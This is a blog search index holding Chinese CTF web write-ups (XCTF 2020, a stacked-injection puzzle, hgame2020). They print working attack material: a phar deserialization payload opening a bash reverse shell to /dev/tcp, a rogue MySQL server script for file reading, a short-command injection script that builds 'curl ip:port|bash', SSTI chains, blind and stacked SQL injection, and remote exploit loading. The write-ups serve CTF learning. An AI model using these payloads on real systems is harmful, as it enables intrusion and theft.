search.xml

<?xml version="1.0" encoding="utf-8"?>
<search>
  <entry>
    <title><![CDATA[xctf战役-2020(web部分复现)]]></title>
    <url>%2F2020%2F03%2F15%2Fxctf%E6%88%98%E5%BD%B9-2020-web%E9%83%A8%E5%88%86%E5%A4%8D%E7%8E%B0%2F</url>
    <content type="text"><![CDATA[前言:xctf的质量还是非常高的，尽管仅能做出比赛的一两题，赛后复现也能学到很多东西webct 扫面发现源码www.zip,其中注意的是**uoloads**目录有个.htaccess1php_flag engine off 也就是说我们上传的脚本都不会被解析，所以直接上马菜刀是走不通的 但题目又要一个测试sql服务的功能，这容易想到Mysql客户端任意文件读取 而mysql数据库传入的option参数可控，将其设置为8可以开启MYSQLI_OPT_LOCAL_INFILE(这个我暂时没查到文档，我理解应该直接填MYSQLI_OPT_LOCAL_INFILE?) 名称 描述 MYSQLI_OPT_CONNECT_TIMEOUT 连接超时设置，以秒为单位（在 Windows 平台上，PHP 5.3.1 之后才支持此选项）。 MYSQLI_OPT_LOCAL_INFILE 启用或禁用 LOAD LOCAL INFILE 语句 MYSQLI_INIT_COMMAND 成功建立 MySQL 连接之后要执行的 SQL 语句 MYSQLI_READ_DEFAULT_FILE 从指定的文件中读取选项，而不是使用 my.cnf 中的选项 MYSQLI_READ_DEFAULT_GROUP 从 my.cnf 或者 MYSQL_READ_DEFAULT_FILE 指定的文件中 读取指定的组中的选项。 MYSQLI_SERVER_PUBLIC_KEY SHA-256 认证模式下，要使用的 RSA 公钥文件。 MYSQLI_OPT_NET_CMD_BUFFER_SIZE 内部命令/网络缓冲大小， 仅在 mysqlnd 驱动下有效。 MYSQLI_OPT_NET_READ_BUFFER_SIZE 以字节为单位，读取 MySQL 命令报文时候的块大小， 仅在 mysqlnd 驱动下有效。 MYSQLI_OPT_INT_AND_FLOAT_NATIVE 将整数和浮点数类型的列转换成 PHP 的数值类型， 仅在 mysqlnd 驱动下有效。 利用脚本伪造服务器，直接读取/flag失败，根据源码想到构造phar文件让msyql去读取触发反序列化 123456789101112131415class Listfile&#123; public $file; function __construct($file) &#123; $this-&gt;file=$file; &#125; function listdir()&#123; system("ls ".$this-&gt;file)."&lt;br&gt;"; &#125; function __call($name, $arguments) &#123; system("ls ".$this-&gt;file); &#125;&#125; 首先生成phar文件 12345678910111213141516171819202122232425&lt;?phpclass Fileupload&#123; public $file;&#125;class Listfile&#123; public $file;&#125;$payload=new Listfile();$payload-&gt;file='$(bash -c "bash -i &gt;&amp; /dev/tcp/ip/port 0&gt;&amp;1")';$file=new Fileupload();$file-&gt;file=$payload;unlink("./phar.phar");$phar = new Phar("./phar.phar");$phar-&gt;startBuffering();$phar-&gt;setStub("GIF89a&lt;?php __HALT_COMPILER(); ?&gt;");$phar-&gt;setMetadata($file);$phar-&gt;addFromString("test.txt", "test");$phar-&gt;stopBuffering();echo urlencode(serialize($file));?&gt; 改后缀为jpg上传，启动伪造服务器 12345678910111213141516171819202122#coding=utf-8 import socketimport logginglogging.basicConfig(level=logging.DEBUG)filename="phar:////var/www/html/uploads/phar.jpg"sv=socket.socket()sv.bind(("",3309))sv.listen(5)conn,address=sv.accept()logging.info('Conn from: %r', address)conn.sendall("\x4a\x00\x00\x00\x0a\x35\x2e\x35\x2e\x35\x33\x00\x17\x00\x00\x00\x6e\x7a\x3b\x54\x76\x73\x61\x6a\x00\xff\xf7\x21\x02\x00\x0f\x80\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x76\x21\x3d\x50\x5c\x5a\x32\x2a\x7a\x49\x3f\x00\x6d\x79\x73\x71\x6c\x5f\x6e\x61\x74\x69\x76\x65\x5f\x70\x61\x73\x73\x77\x6f\x72\x64\x00")conn.recv(9999)logging.info("auth okay")conn.sendall("\x07\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00")conn.recv(9999)logging.info("want file...")wantfile=chr(len(filename)+1)+"\x00\x00\x01\xFB"+filenameconn.sendall(wantfile)content=conn.recv(9999)logging.info(content)conn.close() payload如下，然后nv -lvp port反弹shell 1ip=ip:port&amp;user=user&amp;password=passsword&amp;option=8 fmkq 题目直接给了源码 12345678910111213141516171819202122232425262728293031323334&lt;?php error_reporting(0); if(isset($_GET['head'])&amp;&amp;isset($_GET['url']))&#123; $begin = "The number you want: "; extract($_GET); if($head == '')&#123; die('Where is your head?'); &#125; if(preg_match('/[A-Za-z0-9]/i',$head))&#123; die('Head can\'t be like this!'); &#125; if(preg_match('/log/i',$url))&#123; die('No No No'); &#125; if(preg_match('/gopher:|file:|phar:|php:|zip:|dict:|imap:|ftp:/i',$url))&#123; die('Don\'t use strange protocol!'); &#125; $funcname = $head.'curl_init'; $ch = $funcname(); if($ch)&#123; curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $output = curl_exec($ch); curl_close($ch); &#125; else&#123; $output = 'rua'; &#125; echo sprintf($begin.'%d',$output); &#125; else&#123; show_source(__FILE__); &#125; 看起来是个ssrf,首先head用\转义绕过，然后%s%覆盖begin，使得有结果输出，以下payload成功弹出百度 1?head=\&amp;url=www.baidu.com&amp;begin=%s% 正常ssrf都是通过file等协议去读文件的，但是这里除了http(s)，把能用的协议都ban了,而且没法实行302跳转。比赛时我这里就GG 复现时发现居然内网开放8080端口,直接令url=127.0.0.1:8080 123456Welcome to our FMKQ api, you could use the help information below To read file: /read/file=example&amp;vipcode=example if you are not vip,let vipcode=0,and you can only read /tmp/&#123;file&#125; Other functions only for the vip!!! %d 不是vip的话只能读/tmp上的目录，但flag一般在根目录，我们得首先找到vipcode /read/file=25,感觉像个ssti格式化字符串漏洞 1The content of &#123;5*5&#125; is error%d 下面开始找相关类 12345/read/file=&#123;file.__class__.__init__.__globals__&#125;找到'vip': &lt;class 'base.vip.vip'&gt;/read/file=&#123;file.__class__.__init__.__globals__[vip].__init__.__globals__&#125;找到'vipcode': 'uJvFXyqiHnztNQBU10TYkepKjAh7xVMfmgdS4G9r5sWa6loL 有了vipcode可以读取源码和列目录，知道flag在/fl4g_1s_h3re_u_wi11_rua里，但是读不了，于是读取项目代码 1234567891011121314151617181920212223242526272829class vipreadfile(): def __init__(self,readfile): self.filename = readfile.GetFileName() self.path = os.path.dirname(os.path.abspath(self.filename)) self.file = File(os.path.basename(os.path.abspath(self.filename))) global current_folder_file try: current_folder_file = os.listdir(self.path) except: current_folder_file = current_folder_file def __str__(self): if 'fl4g' in self.path: return 'nonono,this folder is a secret!!!' else: output = '''Welcome,dear vip! Here are what you want:\r\nThe file you read is:\r\n''' filepath = (self.path + '/&#123;vipfile&#125;').format(vipfile=self.file) output += filepath output += '\r\n\r\nThe content is:\r\n' try: f = open(filepath,'r') content = f.read() f.close() except: content = 'can\'t read' output += content output += '\r\n\r\nOther files under the same folder:\r\n' output += ' '.join(current_folder_file) return output 不能出现f14g,用file的第一个字符也是f绕过即可 1/?url=http://localhost:8080/read/file=&#123;vipfile.__class__.__init__.__globals__[vipreadfile].__module__[9]&#125;l4g_1s_h3re_u_wi11_rua/flag%26vipcode=uJvFXyqiHnztNQBU10TYkepKjAh7xVMfmgdS4G9r5sWa6loL&amp;head=\&amp;begin=%s% hackme 代码审计发现不同的session处理PHP反序列化入门之session反序列化 在签名处存在反序列化漏洞，只要用户名为admin就能访问/core/index.php 12345678910111213141516&lt;?phpclass info&#123; public $admin; public $sign="test_sign"; public function __construct()&#123; $this-&gt;admin = 1; &#125;&#125;$a = new info();$b = serialize($a);echo $b;?&gt;#O:4:"info":2:&#123;s:5:"admin";i:1;s:4:"sign";s:9:"test_sign";&#125; 前面加上|然后签名成功访问/core/index.php 12345678910111213141516171819202122232425262728293031&lt;?phpif (isset($_POST['url'])) &#123; $url = $_POST['url']; if (filter_var($url, FILTER_VALIDATE_URL)) &#123; if (preg_match('/(data:\/\/)|(&amp;)|(\|)|(\.\/)/i', $url)) &#123; echo "you are hacker"; &#125; else &#123; $res = parse_url($url); //var_dump($res); echo "\n"; if (preg_match('/127\.0\.0\.1$/', $res['host'])) &#123; $code = file_get_contents($url); echo strlen($code)."\n"; if (strlen($code) &gt;= 4) &#123; @exec($code); echo 'success'; &#125; else &#123; echo "try again"; &#125; &#125; else&#123; echo 'fail'; &#125; &#125; &#125; else &#123; echo "invalid url"; &#125; &#125; else &#123; highlight_file(__FILE__); &#125; ?&gt; filter_var和以及data协议绕过请看ByteCTF_2019 BoringCode 1url=compress.zlib://data:@127.0.0.1/plain;base64,xxxxx; file_get_contents会读取xxx的内容，接下来是在小于4个字节情况下getshell，这一看好像没办法，其实有的，具体看Hitcon2017 babyfirst-revenge 这里还用到一个反弹shell的姿势 1curl ip:port | bash 如果页面有反弹shell的语句，比如bash -i ….是可以成功的 直接上脚本12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849# -*- coding:utf-8 -*-import base64import requestsfrom time import sleepfrom urllib import quotepayload = [# generate "g&gt; ht- sl" to file "v"'&gt;dir','&gt;sl','&gt;g\&gt;','&gt;ht-','*&gt;v',# reverse file "v" to file "x", content "ls -th &gt;g"'&gt;rev','*v&gt;x',# generate "curl ip:port|bash;"'&gt;sh','&gt;ba\\','&gt;\|\\','&gt;28\\','&gt;1\\','&gt;3.\\','&gt;24\\','&gt;8.\\','&gt;9\\','&gt;7.\\','&gt;4\\','&gt;\ \\','&gt;rl\\','&gt;cu\\','sh x','sh g',# got shell]header = &#123; "Cookie": "PHPSESSID=ab2f2756d83f058180b6a0ae53ef8396"&#125;data = &#123;"url":"compress.zlib://data:@127.0.0.1/plain;base64,&#123;&#125;"&#125;r0 = requests.get('http://121.36.222.22:88/core/clear.php')print r0.textr = requests.session()for i in payload: data1 = data["url"].format(base64.b64encode(i)) data2 = &#123;"url":data1&#125; assert len(i) &lt;= 4 r1 = r.post(url = 'http://121.36.222.22:88/core/index.php',headers = header,data = data2) print r1.content easy_trick_gzmtu 传入2020 和Y都能查出结果，传入y20，yy，20y也可以，传入’union select 这些会爆服务器500。猜测后端对参数做了date()转换，用\可以使date后的字符串不变(新姿势) 那就好说了，可以联查 1'\u\n\i\o\n \s\e\l\e\c\t 1,\g\r\o\u\p_\c\o\n\c\a\t(\t\a\b\l\e_\n\a\m\e),3 \f\r\o\m \i\n\f\o\r\m\a\t\i\o\n_\s\c\h\e\m\a.\t\a\b\l\e\s \w\h\e\r\e \t\a\b\l\e_\s\c\h\e\m\a=\d\a\t\a\b\a\s\e()%23 就一般系统表注入查到账号密码和URL 123URL：/eGlhb2xldW5n账号：admin密码：20200202goodluck 进去check.php可以读文件但只能本地访问，可以file://localhost绕过，直接读flag不行，发现页面有注释 1&lt;!-- eGlhb2xldW5n/eGlhb2xldW5nLnBocA==.php --&gt; 读一下这个文件 123456789101112131415161718192021222324252627282930313233343536373839404142434445/eGlhb2xldW5n/check.php?url=file://localhost/var/www/html/eGlhb2xldW5n/eGlhb2xldW5nLnBocA==.php&lt;?phpclass trick&#123; public $gf; public function content_to_file($content)&#123; $passwd = $_GET['pass']; if(preg_match('/^[a-z]+\.passwd$/m',$passwd)) &#123; if(strpos($passwd,"20200202"))&#123; echo file_get_contents("/".$content); &#125; &#125; &#125; public function aiisc_to_chr($number)&#123; if(strlen($number)&gt;2)&#123; $str = ""; $number = str_split($number,2); foreach ($number as $num ) &#123; $str = $str .chr($num); &#125; return strtolower($str); &#125; return chr($number); &#125; public function calc()&#123; $gf=$this-&gt;gf; if(!preg_match('/[a-zA-z0-9]|\&amp;|\^|#|\$|%/', $gf))&#123; eval('$content='.$gf.';'); $content = $this-&gt;aiisc_to_chr($content); return $content; &#125; &#125; public function __destruct()&#123; $this-&gt;content_to_file($this-&gt;calc()); &#125; &#125;unserialize((base64_decode($_GET['code'])));?&gt; 有eval执行，但要绕过2层，第一层passwd是/m多行匹配，如下绕过 1120200202%0aa.paaswd 正则可以取反绕过 12345678910&lt;?phpclass trick&#123; public $gf;&#125;$a = new trick();$a-&gt;gf = '(~'.~'phpinfo'.')();';echo urlencode(base64_encode(serialize($a)));# Tzo1OiJ0cmljayI6MTp7czoyOiJnZiI7czoxMzoiKH6Pl4%2BWkZmQKSgpOyI7fQ%3D%3D?&gt; 新姿势 我们使用这条代码 &lt;?php echo !!‘@’;?&gt; 发现打印出来的是1，那么我们只需利用 !!‘@’ 相加减 乘除再通过拼接字符串（.）即可得到FLAG(70766571)。1((!!'@'+!!'@'+!!'@')*(!!'@'+!!'@')+!!'@').(!!'@'-!!'@').((!!'@'+!!'@'+!!'@')* (!!'@'+!!'@')+!!'@').((!!'@'+!!'@'+!!'@')*(!!'@'+!!'@')).((!!'@'+!!'@'+!!'@')* (!!'@'+!!'@')).(((!!'@'+!!'@'+!!'@')*(!!'@'+!!'@'))-!!'@').((!!'@'+!!'@'+!!'@')* (!!'@'+!!'@')+!!'@').(!!'@'); nweb 查看源码发现注释 1&lt;!-- 110 --&gt; 故注册时改type为110就可以注册一个有权限的账号，进去后在search.php里发现存在注入 双写select和from绕过 12345678910111213141516171819202122232425262728293031323334353637383940414243444546import hackhttphhp = hackhttp.hackhttp()url = 'http://121.37.179.47:1001/search.php'str1 = '''POST /search.php HTTP/1.1Host: 121.37.179.47:1001Content-Length: 60Pragma: no-cacheCache-Control: no-cacheOrigin: http://121.37.179.47:1001Upgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.87 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Referer: http://121.37.179.47:1001/search.phpAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-US;q=0.7Cookie: PHPSESSID=tm931kor7tr5qnhd641nb9qrg7; username=6620aef2bb0988189fc2e05465b2c4d1Connection: close&#123;&#125;'''str2 = "flag=1'or ascii(substr((selselectect flag frfromom fl4g),&#123;&#125;,1))&gt;&#123;&#125;%23"res = ''for i in range(1,10000): tmp = len(res) high = 127 low = 31 mid = (low + high) // 2 while high &gt; low: data = str1.format(str2.format(i,mid)) code, head, html, redirect, log = hhp.http(url, raw=data) if '!' in html: low = mid + 1 else: high = mid mid = (low + high) // 2 res += chr(int(mid)) print(res) if mid == 31: print(res[:-1]) print('emm.......') exit(-1) 这只能注出一半flag,剩下一半登陆admin看flag.php 但是admin登陆后有个数据库端口扫描功能，很明显的mysql客户端任意文件读取，直接rouge mysql server读flag即可 PHP-UAF12345678910&lt;?php$sandbox = '/var/www/html/sandbox/' . md5("wdwd" . $_SERVER['REMOTE_ADDR']);@mkdir($sandbox);@chdir($sandbox);if (isset($_REQUEST['cmd'])) &#123; @eval($_REQUEST['cmd']);&#125;highlight_file(__FILE_ 上了个大马并没有卵用，看phpinfo()，发现PHP是7.4.2，直接用现成exp 把pwn(“uname -a”);改为pwn(“/readflag”),然后放到远程服务器上 1/?cmd=veal(file_get_contents('http://vps/exp.php')) 或者改为pwn($_GET[‘pass’]),从远程服务器copy到题目中 1copy("http://vps/1.txt","/tmp/1.txt") 然后直接include执行 1?cmd=include("/tmp/1.txt");&amp;pass=ls /]]></content>
      <categories>
        <category>CTFWP</category>
      </categories>
      <tags>
        <tag>Web</tag>
        <tag>复现</tag>
      </tags>
  </entry>
  <entry>
    <title><![CDATA[一道堆叠注入的深入理解]]></title>
    <url>%2F2020%2F03%2F05%2F%E4%B8%80%E9%81%93%E5%A0%86%E5%8F%A0%E6%B3%A8%E5%85%A5%E7%9A%84%E6%B7%B1%E5%85%A5%E7%90%86%E8%A7%A3%2F</url>
    <content type="text"><![CDATA[强网杯随便住所带来的一些waf及绕过(训练平台buuctf) 进来是一个输入框123456789http://e363d307-2ea5-4947-921c-99079448435d.node1.buuoj.cn/?inject=1回显:array(2) &#123; [0]=&gt; string(1) "1" [1]=&gt; string(7) "hahahah"&#125; 输入’报错 1234http://e363d307-2ea5-4947-921c-99079448435d.node1.buuoj.cn/?inject=1'回显：error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1 通过回显发现列数为2 1234http://e363d307-2ea5-4947-921c-99079448435d.node1.buuoj.cn/?inject=1' union select 1,2 #回显：return preg_match("/select|update|delete|drop|insert|where|\./i",$inject); 过滤了很多关键字,后来发现是堆叠注入 Stacked injections(堆叠注入)从名词的含义就可以看到应该是一堆 sql 语句(多条)一起执行。而在真实的运用中也是这样的, 我们知道在 mysql 中, 主要是命令行中, 每一条语句结尾加; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做 stacked injection。 在SQL中，分号（;）是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句，会不会一起执行？因此这个想法也就造就了堆叠注入。而union injection（联合注入）也是将两条语句合并在一起，两者之间有什么区别么？区别就在于union 或者union all执行的语句类型是有限的，可以用来执行查询语句，而堆叠注入可以执行的是任意的语句。例如以下这个例子。用户输入：1; DELETE FROM products服务器端生成的sql语句为： Select * from products where productid=1;DELETE FROM products当执行查询后，第一条显示查询信息，第二条则将整个表进行删除。 查表 12345678910111213141516171819http://e363d307-2ea5-4947-921c-99079448435d.node1.buuoj.cn/?inject=1';show tables;#回显：array(2) &#123; [0]=&gt; string(1) "1" [1]=&gt; string(7) "hahahah"&#125;array(1) &#123; [0]=&gt; string(16) "1919810931114514"&#125;array(1) &#123; [0]=&gt; string(5) "words"&#125; 经测试发现flag在1919810931114514表中 尝试查表内容 1234http://e363d307-2ea5-4947-921c-99079448435d.node1.buuoj.cn/?inject=1%27;set@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;#回显：strstr($inject, "set") &amp;&amp; strstr($inject, "prepare") 大小写绕过 1234567891011121314http://e363d307-2ea5-4947-921c-99079448435d.node1.buuoj.cn/?inject=1%27;Set@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;Prepare execsql from @a;execute execsql;#回显：array(2) &#123; [0]=&gt; string(1) "1" [1]=&gt; string(7) "hahahah"&#125;array(1) &#123; [0]=&gt; string(42) "flag&#123;3d05bcc4-ae5d-4014-88bf-b945dc7cce65&#125;"&#125; ps:0x73656c656374202a2066726f6d20603139313938313039333131313435313460==select * from `1919810931114514`,`为反引号 进阶1return preg_match("/select|update|delete|drop|insert|where|\./i",$inject); 从上面可以看到其实过滤比较少，我们在注入中还用到了set和prepare,如果把这个2个也加进黑名单呢？ 这时我们可以用如下操作，关键字为alert和rename 12345671.将words表改名为word1或其它任意名字2.1919810931114514改名为words3.将新的word表插入一列，列名为id #因为通过desc发现flag表里面没有id字段4.将flag列改名为data 这样我们就把flag放到默认表了 11';rename table words to word1;rename table `1919810931114514` to words;alter table words add id int unsigned not Null auto_increment primary key;alert table words change flag data varchar(100)# 直接1’ or 1=1#读到flag 进阶plus 天杀的出题人为难人最了得，直接继续把alert和rename放进黑名单，搞得我做过一样的题，但还是莫得办法，太菜了 办法总比困难多吧，学习姿势更重要！mysql查询语句-handler11';handler FlagHere open;handler FlagHere read first;#]]></content>
      <categories>
        <category>CTFWP</category>
      </categories>
      <tags>
        <tag>Web</tag>
        <tag>SQL</tag>
      </tags>
  </entry>
  <entry>
    <title><![CDATA[hgame2020部分WP]]></title>
    <url>%2F2020%2F02%2F10%2Fhgame2020%E9%83%A8%E5%88%86WP%2F</url>
    <content type="text"><![CDATA[Week-1webCosmos 的博客 很明显提醒了版本管理工具和git 访问/.git/config 12345678[core] repositoryformatversion = 0 filemode = true bare = false logallrefupdates = true[remote "origin"] url = https://github.com/FeYcYodhrPDJSru/8LTUKCL83VLhXbc fetch = +refs/heads/*:refs/remotes/origin/* 把库down下来,用TortioseGit-&gt;Show ReFlog-&gt;show log 找到flag文件,base64解码即可 接 头 霸 王 这题主要修改各种请求头，值得注意的是最后一个 Last-Modified: Fri, 01 Jan 2077 00:00:00 GMT 关于If-Unmodified-Since参考 最终exp123456curl -X GET \ http://kyaru.hgame.n3ko.co/ \ -H 'Host: kyaru.hgame.n3ko.co' \ -H 'If-Unmodified-Since: Tue, 7 Oct 2077 00:00:00 GMT' \ -H 'Referer: vidar.club' \ -H 'User-Agent: Cosmos' \ -H 'X-Forwarded-For: 127.0.0.1' Code World 点进去跳到/new.php的页面，显示403 Forbidden 抓包发现302跳转且出现状态码405,可能是请求方式不对 改GET为POST得到人机认证页面，要我们使两个数相加为10 考虑到+号在URL中表示为空格,因此将其Urlencode 因此抓包POST /?a=5%2b5 鸡尼泰玫 这是一个以我坤做的小页游，理论达到30000分数即可getflag 当然既然是CTF一般不会让你真的玩游戏，所以这题是JS调试 Google浏览器F12走起,然后F8，在game.js/?s=4里进行调试将globalScore改为30000即可 misc欢迎参加HGame！ 签到题给出如下 Li0tIC4uLi0tIC4tLi4gLS4tLiAtLS0tLSAtLSAuIC4uLS0uLSAtIC0tLSAuLi0tLi0gLi4tLS0gLS0tLS0gLi4tLS0gLS0tLS0gLi4tLS4tIC4uLi4gLS0uIC4tIC0tIC4uLi0t base64-&gt;摩斯编码即可getflag 壁纸 图片包含一个压缩包zip，打开压缩包发现提示 Password is picture ID. 通过社工发现https://www.pixiv.net/artworks/76953815 76953815即为密码得到flag.txt \u68\u67\u61\u6d\u65\u7b\u44\u6f\u5f\u79\u30\u75\u5f\u4b\u6e\u4f\u57\u5f\u75\u4 e\u69\u43\u30\u64\u33\u3f\u7d 补零为Unicode \u0068\u0067\u0061\u006d\u0065\u007b\u0044\u006f\u005f\u0079\u0030\u0075\u005f\ u004b\u006e\u004f\u0057\u005f\u0075\u004e\u0069\u0043\u0030\u0064\u0033\u003f\u 007d 解码即可,也可按\u后面的数字进行ascii解码 克苏鲁神话 解压题目发现有Bacon.txt和有密码的Novel.zip，同时发现Novel.zip里面有一个Bacon.txt,查看其crc32发现一致，考虑明文攻击 这里用7-zip压缩(原来用了什么软件压缩，就用什么，即使同为zip不同软件的算法不一样的) 解密出来发现doc文档有密码，再看一下Bacon.txt 12of SuCh GrEAt powers OR beiNGS tHere may BE conCEivAbly A SuRvIval oF HuGely REmOTE periOd.*Password in capital letters. 猜测为培根密码 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970# -*- coding: cp936 -*-strr='ofSuChGrEAtpowersORbeiNGStHeremayBEconCEivAblyASuRvIvaloFHuGelyREmOTEperiOd'flag=''for i in strr: if ord(i) &gt;= 65 and ord(i) &lt;= 90: flag += 'b' else: flag += 'a'print(flag)letters1 = [ 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z',]letters2 = [ 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z',]cipher1 = [ "aaaaa", "aaaab", "aaaba", "aaabb", "aabaa", "aabab", "aabba", "aabbb", "abaaa", "abaab", "ababa", "ababb", "abbaa", "abbab", "abbba", "abbbb", "baaaa", "baaab", "baaba", "baabb", "babaa", "babab", "babba", "babbb", "bbaaa", "bbaab",]cipher2 = [ "AAAAA", "AAAAB", "AAABA", "AAABB", "AABAA", "AABAB", "AABBA", "AABBB", "ABAAA", "ABAAA", "ABAAB", "ABABA", "ABABB", "ABBAA", "ABBAB", "ABBBA", "ABBBB", "BAAAA", "BAAAB", "BAABA", "BAABB", "BAABB", "BABAA", "BABAB", "BABBA", "BABBB",]def bacon1(string): lists = [] # 分割，五个一组 for i in range(0, len(string), 5): lists.append(string[i:i+5]) # print(lists) # 循环匹配，得到下标，对应下标即可 for i in range(0, len(lists)): for j in range(0, 26): if lists[i] == cipher1[j]: # print(j) print(letters1[j], end="") print("")def bacon2(string): lists = [] # 分割，五个一组 for i in range(0, len(string), 5): lists.append(string[i:i+5]) # print(lists) # 循环匹配，得到下标，对应下标即可 for i in range(0, len(lists)): for j in range(0, 26): if lists[i] == cipher2[j]: # print(j) print(letters2[j], end="") print("")if __name__ == "__main__": bacon1("aababababbaaaaaaabba") bacon2("AABABABABAAAAAAAABBA") bacon1(flag) bacon2(flag) 得到doc密码FLAGHIDDENINDOC 进入文档显示隐藏文字找到flag 签到题ProPlus 解压附件得到加密的OK.zip和Password.txt,Password内容如下 12345Rdjxfwxjfimkn z,ts wntzi xtjrwm xsfjt jm ywt rtntwhf f y h jnsxf qjFjf jnb rg fiyykwtbsnkm tm xa jsdwqjfmkjy wlviHtqzqsGsffywjjyynf yssm xfjypnyihjn.JRFVJYFZVRUAGMAI* Three fenses first, Five Caesar next. English sentense first, zip password next. 按提示解密得到 123Many years later as he faced the firing squad, Colonel Aureliano Buendia was to remember that distant afternoon when his father took him to discover ice.EAVMUBAQHQMVEPDT EAVMUBAQHQMVEPDT为解压密码打开OK.zip 接着是解密:OOK-&gt;base32-&gt;base64 将base64解码内容二进制保存为png得到二维码，扫码getflag 每日推荐 解压附件得到Capture1.pcapng，wireshark打开 导出http对象，发现一个比较大的php文件发现里面藏着zip 提示密码为6位数字爆破得759371 解压得到mp3文件，丢进audacity,在频谱图里看到flag Week-2webCosmos的博客后台 进来是一个登陆框 一开始以为是注入，一顿操作没发现注入点 后来注意到主页跳转到/?action=login.php 尝试php伪协议 123456789101112131415161718192021222324action=php://filter/convert.base64-encode/resource=login.phpinclude "config.php";nsession_start();//Only for debug if (DEBUG_MODE)&#123; if(isset($_GET['debug'])) &#123; $v = $_GET['debug']; if (!preg_match("/^[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*$/", $v)) &#123; die("args error!"); &#125; eval("var_dump($$v);"); &#125; &#125;........ if (isset($_POST['username']) &amp;&amp; isset($_POST['password'])) &#123; if ($admin_password == md5($_POST['password']) &amp;&amp; $_POST['username'] === $admin_username)&#123; $_SESSION['username'] = $_POST['username']; header("Location: admin.php"); exit(); &#125; else &#123; echo "用户或密码错误"; &#125; &#125; 可以知道$admin_password和$admin_username被定义在config.php中，我们可以尝试用超全局变量GLOBALS获取 /?action=login.php&amp;debug=GLOBALS 1array(11) &#123; ["_GET"]=&gt; array(2) &#123; ["action"]=&gt; string(9) "login.php" ["debug"]=&gt; string(7) "GLOBALS" &#125; ["_POST"]=&gt; array(0) &#123; &#125; ["_COOKIE"]=&gt; array(1) &#123; ["PHPSESSID"]=&gt; string(26) "3ah0se711epa48hstc537tce2b" &#125; ["_FILES"]=&gt; array(0) &#123; &#125; ["action"]=&gt; string(9) "login.php" ["filter"]=&gt; string(18) "/config|etc|flag/i" ["_SESSION"]=&gt; &amp;array(0) &#123; &#125; ["debug"]=&gt; string(7) "GLOBALS" ["admin_password"]=&gt; string(32) "0e114902927253523756713132279690" ["admin_username"]=&gt; string(7) "Cosmos!" ["GLOBALS"]=&gt; array(11) &#123; ["_GET"]=&gt; array(2) &#123; ["action"]=&gt; string(9) "login.php" ["debug"]=&gt; string(7) "GLOBALS" &#125; ["_POST"]=&gt; array(0) &#123; &#125; ["_COOKIE"]=&gt; array(1) &#123; ["PHPSESSID"]=&gt; string(26) "3ah0se711epa48hstc537tce2b" &#125; ["_FILES"]=&gt; array(0) &#123; &#125; ["action"]=&gt; string(9) "login.php" ["filter"]=&gt; string(18) "/config|etc|flag/i" ["_SESSION"]=&gt; &amp;array(0) &#123; &#125; ["debug"]=&gt; string(7) "GLOBALS" ["admin_password"]=&gt; string(32) "0e114902927253523756713132279690" ["admin_username"]=&gt; string(7) "Cosmos!" ["GLOBALS"]=&gt; *RECURSION* &#125; &#125; 尽管知道了账号密码，但是密码经过md5加密，我们便无法还原原来的密码，不过注意到 12$admin_password == md5($_POST['password']["admin_password"]=&gt; string(32) "0e114902927253523756713132279690" 弱类型和0e,随便找一个md5后为0e开头的字符串就行,账号为Cosmos! s155964671a 登陆后有一个外部URL插入图片功能，php伪协议获得admin.php代码 1234567891011121314151617181920function insert_img() &#123; if (isset($_POST['img_url'])) &#123; $img_url = @$_POST['img_url']; $url_array = parse_url($img_url); if (@$url_array['host'] !== "localhost" &amp;&amp; $url_array['host'] !== "timgsa.baidu.com") &#123; return false; &#125; $c = curl_init(); curl_setopt($c, CURLOPT_URL, $img_url); curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); $res = curl_exec($c); curl_close($c); $avatar = base64_encode($res); if(filter_var($img_url, FILTER_VALIDATE_URL)) &#123; return $avatar; &#125; &#125; else &#123; return base64_encode(file_get_contents("static/logo.png")); &#125; 该函数限定我们只能从localhost和timgsa.baidu.com获取外部图片，然而在curl下使用file协议时，host会被忽略但还是能读取到内容 构造file://localhost/flag，flag会被base64编码后显示在img标签中1&lt;img height="200" width="500" src="data:image/jpeg;base64,aGdhbWV7cEhwXzFzX1RoM19CM3NUX0w0bkd1NGdFIUAhfQo="&gt; 